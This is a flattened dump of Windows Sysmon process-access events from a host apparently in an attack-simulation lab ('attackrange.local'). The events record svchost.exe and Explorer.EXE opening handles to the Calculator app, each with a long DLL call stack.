22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361805Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361804Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361803Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-337b-6013-8402-000000001100}16568356C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+10c49|C:\Windows\System32\NPSMDesktopProvider.dll+10b82|C:\Windows\System32\NPSMDesktopProvider.dll+774d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361802Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361801Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361800Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361799Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361798Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361797Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361796Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361795Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361794Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361793Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361792Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361791Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361790Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361789Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361788Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361787Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361786Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361785Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361784Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.304{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361783Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 